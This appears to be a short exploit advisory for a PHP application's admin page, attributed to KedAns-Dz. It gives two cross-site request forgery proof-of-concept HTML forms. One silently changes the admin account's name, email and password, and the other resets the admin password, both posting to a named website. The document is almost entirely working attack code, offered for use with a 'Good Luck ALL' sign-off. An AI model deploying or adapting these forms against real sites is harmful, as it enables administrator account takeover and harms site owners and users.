# Platform: php
# Impact: Remote Cross-Site Request Forgery (Multiple)
# Tested on: [Windows XP sp3 FR] & [Linux. (Ubuntu 10.10) En] & [Mac OS x 10.6.1] & [BSDi-BSD/OS 4.2]
###
#(~) Greetings To: Caddy-Dz (+) JaGo-Dz (+) Dr. Ride (+) All My Friends
###
# The Vulnerabilities in Page: [../libs/ADMIN. php] <Can Ability Remote Cross-Site Request Forgery
#(!) Exploit & PoC:
# = (1) ===== [Change Admin Settings:] =======>
<Div>
<H3> Change Admin Settings: <Form method = "post" action = "http://www.bkjia.com/index.php" name = "memberedit"> <div>
<Input type = "hidden" name = "action" value = "changemembersettings"/>
<Input type = "hidden" name = "memberid" value = "1"/>
<Table> <tr> <td>
<Td> <input name = "name" value = "admin"/> </td>
<Td> <input name = "realname" value = "KedAns-Dz"/> </td>
<Td> <input type = "password" name = "password"/> </td>
<Td> <input type = "password" name = "repeatpassword"/> </td>
<Td> <input name = "email" value = "ked-h@1337day.com"/> </td>
<Td> <input name = "url" value = "http://1337day.com"/> </td>
</Table> </tr> </td>
<Input type = "submit" value = "Submit" onclick = "return checkSubmit ();"/>
</Form>
</Div>
# = (2) ===== [Change Admin password:] =====>
<Div>
<H3> Change Admin Password: <Form action = "http://www.bkjia.com/index.php" method = "post">
<Input type = "hidden" name = "action" value = "activatesetpwd"/>
<Input type = "hidden" name = "key" value = "1"/>
<Table> <tr>
<Td> <input type = "password" name = "password"/> </td>
<Td> <input type = "password" name = "repeatpassword"/> </td>
</Tr> </table>
<Td> <input type = submit value = Submit/> </td>
</Form>
</Div>
# (^_^ )! Good Luck ALL...